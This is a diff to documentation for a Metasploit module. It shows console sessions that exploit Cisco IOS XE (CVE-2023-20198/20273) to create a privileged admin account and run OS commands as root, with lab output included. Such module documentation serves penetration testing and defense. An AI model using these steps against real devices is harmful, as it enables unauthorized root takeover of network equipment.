@@ -89,50 +89,42 @@ can be locked preventing deleting upon the first attempt, so the module will try
8989## Scenarios
9090
9191```
92- msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
93- msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOST 192.168.86.57
94- RHOST => 192.168.86.57
95- msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set CMD "id"
96- CMD => id
9792msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options
9893
9994Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):
10095
10196 Name Current Setting Required Description
10297 ---- --------------- -------- -----------
98+ CISCO_ADMIN_PASSWORD no The password of an admin account. If not set, CVE-2023 -20198 is leveraged to c
99+ reate a new admin password.
100+ CISCO_ADMIN_USERNAME no The username of an admin account. If not set, CVE-2023 -20198 is leveraged to c
101+ reate a new admin account.
103102 CMD id yes The OS command to execute.
104103 Proxies no A proxy chain of format type:host: port [ ,type:host: port ] [ ...]
105- REMOVE_OUTPUT_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to removing the commands output file.
106- RHOSTS 192.168.86.57 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
104+ REMOVE_OUTPUT_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to removing the commands
105+ output file.
106+ RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
107+ cs/using-metasploit.html
107108 RPORT 443 yes The target port (TCP)
108109 SSL true no Negotiate SSL/TLS for outgoing connections
109110 VHOST no HTTP server virtual host
110111
111112
112113View the full module info with the info, or info -d command.
113114
115+ msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
116+ rhosts => 10.5.135.193
117+ msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
118+ verbose => true
114119msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
115- [ * ] Running module against 192.168.86.57
120+ [ * ] Running module against 10.5.135.193
116121
117- [ * ] uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t: s0
122+ [ * ] Created privilege 15 user 'rfojGrqA' with password 'ixnXyFlw'
123+ uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t: s0
118124
125+ [ * ] Removing output file '/var/www/fNrmuBOf'
126+ [ * ] Removing user 'rfojGrqA'
119127[ * ] Auxiliary module execution completed
120- msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="uname -a"
121- [ * ] Running module against 192.168.86.57
122128
123- [ * ] Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
124-
125- [ * ] Auxiliary module execution completed
126- msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="cat /etc/release"
127- [ * ] Running module against 192.168.86.57
128-
129- [ * ] # Needed for open-vm-tools
130- # Copyright (c) 2016 by Cisco Systems, Inc., All rights reserved.
131- DISTRIB_ID=Cisco
132- DISTRIB_RELEASE=3.10.84
133- DISTRIB_CODENAME=IOS-XE
134- DISTRIB_DESCRIPTION="Monte Vista Linux"
135-
136- [ * ] Auxiliary module execution completed
137129msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) >
138130```
0 commit comments